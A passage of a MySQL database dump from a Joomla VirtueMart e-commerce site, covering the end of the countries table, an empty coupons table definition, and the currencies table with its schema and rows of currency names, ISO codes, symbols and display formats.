00:00:00',0),(245,1,'Serbia','SRB','RS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(246,1,'Sint Maarten (French Antilles)','MAF','MF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(247,1,'Sint Maarten (Netherlands Antilles)','SXM','SX',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(248,1,'Palestinian Territory, occupied','PSE','PS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `myaou_virtuemart_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_coupons`
--

DROP TABLE IF EXISTS `myaou_virtuemart_coupons`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_coupons` (
  `virtuemart_coupon_id` int unsigned NOT NULL AUTO_INCREMENT,
  `coupon_code` char(32) NOT NULL DEFAULT '',
  `percent_or_total` enum('percent','total') NOT NULL DEFAULT 'percent',
  `coupon_type` enum('gift','permanent') NOT NULL DEFAULT 'gift',
  `coupon_value` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `coupon_start_date` datetime DEFAULT NULL,
  `coupon_expiry_date` datetime DEFAULT NULL,
  `coupon_value_valid` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `coupon_used` varchar(200) NOT NULL DEFAULT '',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_coupon_id`),
  KEY `idx_coupon_code` (`coupon_code`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Used to store coupon codes';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_coupons`
--

LOCK TABLES `myaou_virtuemart_coupons` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_coupons` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_coupons` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_currencies`
--

DROP TABLE IF EXISTS `myaou_virtuemart_currencies`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_currencies` (
  `virtuemart_currency_id` smallint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint unsigned NOT NULL DEFAULT '1',
  `currency_name` char(64) DEFAULT NULL,
  `currency_code_2` char(2) DEFAULT NULL,
  `currency_code_3` char(3) DEFAULT NULL,
  `currency_numeric_code` int DEFAULT NULL,
  `currency_exchange_rate` decimal(10,5) DEFAULT NULL,
  `currency_symbol` char(4) DEFAULT NULL,
  `currency_decimal_place` char(4) DEFAULT NULL,
  `currency_decimal_symbol` char(4) DEFAULT NULL,
  `currency_thousands` char(4) DEFAULT NULL,
  `currency_positive_style` char(64) DEFAULT NULL,
  `currency_negative_style` char(64) DEFAULT NULL,
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '1',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_currency_id`),
  KEY `ordering` (`ordering`),
  KEY `published` (`published`),
  KEY `shared` (`shared`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `idx_currency_code_3` (`currency_code_3`),
  KEY `idx_currency_numeric_code` (`currency_numeric_code`)
) ENGINE=MyISAM AUTO_INCREMENT=202 DEFAULT CHARSET=utf8mb3 COMMENT='Used to store currencies';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_currencies`
--

LOCK TABLES `myaou_virtuemart_currencies` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_currencies` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_currencies` VALUES (2,1,'United Arab Emirates dirham','','AED',784,0.00000,'د.إ','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(4,1,'Albanian lek','','ALL',8,0.00000,'Lek','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(5,1,'Netherlands Antillean gulden','','ANG',532,0.00000,'ƒ','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(7,1,'Argentine peso','','ARS',32,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(9,1,'Australian dollar','','AUD',36,0.00000,'$','2','.','','{symbol} {number}','{sign}{symbol} {number}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(10,1,'Aruban florin','','AWG',533,0.00000,'ƒ','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(11,1,'Barbadian dollar','','BBD',52,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(12,1,'Bangladeshi taka','','BDT',50,0.00000,'৳','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(15,1,'Bahraini dinar','','BHD',48,0.00000,'ب.د','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(16,1,'Burundian franc','','BIF',108,0.00000,'Fr','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(17,1,'Bermudian dollar','','BMD',60,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(18,1,'Brunei dollar','','BND',96,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(19,1,'Bolivian boliviano','','BOB',68,0.00000,'$b','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(20,1,'Brazilian real','','BRL',986,0.00000,'R$','2',',','.','{symbol} {number}','{symbol} {sign}{number}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(21,1,'Bahamian dollar','','BSD',44,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(22,1,'Bhutanese ngultrum','','BTN',64,0.00000,'BTN','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(24,1,'Botswana pula','','BWP',72,0.00000,'P','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(25,1,'Belize dollar','','BZD',84,0.00000,'BZ$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(26,1,'Canadian dollar','','CAD',124,0.00000,'$','2','.',',','{symbol}{number}','{symbol}{sign}{number}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(27,1,'Swiss franc','','CHF',756,0.00000,'CHF','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(28,1,'Unidad de Fomento','','CLF',990,0.00000,'CLF','0',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(29,1,'Chilean peso','','CLP',152,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(30,1,'Chinese renminbi yuan','','CNY',156,0.00000,'元','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(31,1,'Colombian peso','','COP',170,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(32,1,'Costa Rican colón','','CRC',188,0.00000,'₡','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(33,1,'Czech koruna','','CZK',203,0.00000,'Kč','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(34,1,'Cuban peso','','CUP',192,0.00000,'₱','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(35,1,'Cape Verdean escudo','','CVE',132,0.00000,'$','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(40,1,'Danish krone','','DKK',208,0.00000,'kr','2','.',',','{symbol}{number}','{symbol}{sign}{number}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(41,1,'Dominican peso','','DOP',214,0.00000,'RD$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(42,1,'Algerian dinar','','DZD',12,0.00000,'د.ج','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(44,1,'Egyptian pound','','EGP',818,0.00000,'£','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(46,1,'Ethiopian birr','','ETB',230,0.00000,'ETB','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(47,1,'Euro','','EUR',978,0.00000,'€','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(49,1,'Fijian dollar','','FJD',242,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(50,1,'Falkland pound','','FKP',238,0.00000,'£','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(52,1,'British pound','','GBP',826,0.00000,'£','2','.',',','{symbol}{number}','{symbol}{sign}{number}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(54,1,'Gibraltar pound','','GIP',292,0.00000,'£','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(55,1,'Gambian dalasi','','GMD',270,0.00000,'D','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(56,1,'Guinean franc','','GNF',324,0.00000,'Fr','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(58,1,'Guatemalan quetzal','','GTQ',320,0.00000,'Q','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(60,1,'Guyanese dollar','','GYD',328,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(61,1,'Hong Kong dollar','','HKD',344,0.00000,'元','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(62,1,'Honduran lempira','','HNL',340,0.00000,'L','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(63,1,'Haitian gourde','','HTG',332,0.00000,'G','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(64,1,'Hungarian forint','','HUF',348,0.00000,'Ft','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(65,1,'Indonesian rupiah','','IDR',360,0.00000,'Rp','0','','','{symbol}{number}','{symbol}{sign}{number}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(67,1,'Israeli new sheqel','','ILS',376,0.00000,'₪','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(68,1,'Indian rupee','','INR',356,0.00000,'₨','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(69,1,'Iraqi dinar','','IQD',368,0.00000,'ع.د','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(70,1,'Iranian rial','','IRR',364,0.00000,'﷼','2',',','','{number} {symbol}','{sign}{number}{symb0l}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(73,1,'Jamaican dollar','','JMD',388,0.00000,'J$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(74,1,'Jordanian dinar','','JOD',400,0.00000,'د.ا','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(75,1,'Japanese yen','','JPY',392,0.00000,'¥','0',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(76,1,'Kenyan shilling','','KES',404,0.00000,'Sh','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(77,1,'Cambodian riel','','KHR',116,0.00000,'៛','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(78,1,'Comorian franc','','KMF',174,0.00000,'Fr','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(79,1,'North Korean won','','KPW',408,0.00000,'₩','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(80,1,'South Korean won','','KRW',410,0.00000,'₩','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(81,1,'Kuwaiti dinar','','KWD',414,0.00000,'د.ك','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(82,1,'Cayman Islands dollar','','KYD',136,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(83,1,'Lao kip','','LAK',418,0.00000,'₭','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(84,1,'Lebanese pound','','LBP',422,0.00000,'£','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(85,1,'Sri Lankan rupee','','LKR',144,0.00000,'₨','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(86,1,'Liberian dollar','','LRD',430,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(87,1,'Lesotho loti','','LSL',426,0.00000,'L','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(89,1,'Libyan dinar','','LYD',434,0.00000,'ل.د','3',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(90,1,'Moroccan dirham','','MAD',504,0.00000,'د.م.','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(92,1,'Mongolian tögrög','','MNT',496,0.00000,'₮','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(93,1,'Macanese pataca','','MOP',446,0.00000,'P','1',',','','{symbol}{number}','{symbol}{sign}{number}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(94,1,'Mauritanian ouguiya','','MRO',478,0.00000,'UM','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(96,1,'Mauritian rupee','','MUR',480,0.00000,'₨','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(97,1,'Maldivian rufiyaa','','MVR',462,0.00000,'ރ.','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(98,1,'Malawian kwacha','','MWK',454,0.00000,'MK','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(100,1,'Malaysian ringgit','','MYR',458,0.00000,'RM','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(102,1,'Nigerian naira','','NGN',566,0.00000,'₦','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(105,1,'Norwegian krone','','NOK',578,0.00000,'kr','2',',','','{symbol}{number}','{symbol}{sign}{number}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(106,1,'Nepalese rupee','','NPR',524,0.00000,'₨','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(107,1,'New Zealand dollar','','NZD',554,0.00000,'$','2',',','','{number} {symbol}','{symbol}{sign}{number}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(108,1,'Omani rial','','OMR',512,0.00000,'﷼','3','.','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(109,1,'Panamanian balboa','','PAB',590,0.00000,'B/.','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(110,1,'Peruvian nuevo sol','','PEN',604,0.00000,'S/.','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(111,1,'Papua New Guinean kina','','PGK',598,0.00000,'K','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(112,1,'Philippine peso','','PHP',608,0.00000,'₱','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(113,1,'Pakistani rupee','','PKR',586,0.00000,'₨','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(114,1,'Polish Złoty','','PLN',985,0.00000,'zł','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(116,1,'Paraguayan guaraní','','PYG',600,0.00000,'₲','0','','.','{symbol} {number}','{symbol} {sign}{number}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(117,1,'Qatari riyal','','QAR',634,0.00000,'﷼','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(118,1,'Romanian leu','','RON',946,0.00000,'lei','2',',','.','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(119,1,'Rwandan franc','','RWF',646,0.00000,'Fr','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(120,1,'Saudi riyal','','SAR',682,0.00000,'﷼','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(121,1,'Solomon Islands dollar','','SBD',90,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(122,1,'Seychellois rupee','','SCR',690,0.00000,'₨','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(124,1,'Swedish krona','','SEK',752,0.00000,'kr','2',',','.','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(125,1,'Singapore dollar','','SGD',702,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(126,1,'Saint Helenian pound','','SHP',654,0.00000,'£','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(127,1,'Sierra Leonean leone','','SLL',694,0.00000,'Le','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(128,1,'Somali shilling','','SOS',706,0.00000,'S','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(130,1,'São Tomé and Príncipe dobra','','STD',678,0.00000,'Db','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(131,1,'Russian ruble','','RUB',643,0.00000,'руб','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(132,1,'Salvadoran colón','','SVC',222,0.00000,'$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(133,1,'Syrian pound','','SYP',760,0.00000,'£','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(134,1,'Swazi lilangeni','','SZL',748,0.00000,'L','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(135,1,'Thai baht','','THB',764,0.00000,'฿','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(136,1,'Tunisian dinar','','TND',788,0.00000,'د.ت','3',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(137,1,'Tongan paʻanga','','TOP',776,0.00000,'T$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(139,1,'Turkish new lira','','TRY',949,0.00000,'YTL','2',',','.','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(140,1,'Trinidad and Tobago dollar','','TTD',780,0.00000,'TT$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(141,1,'New Taiwan dollar','','TWD',901,0.00000,'NT$','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(142,1,'Tanzanian shilling','','TZS',834,0.00000,'Sh','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(144,1,'United States dollar','','USD',840,0.00000,'$','2','.',',','{symbol}{number}','{symbol}{sign}{number}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(147,1,'Vietnamese Dong','','VND',704,0.00000,'₫','0','','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(148,1,'Vanuatu vatu','','VUV',548,0.00000,'Vt','2',',','','{number} {symbol}','{sign}{number} {symbol}',0,1,1,'0000-00-00 00:00:00',0,'0000-00-00 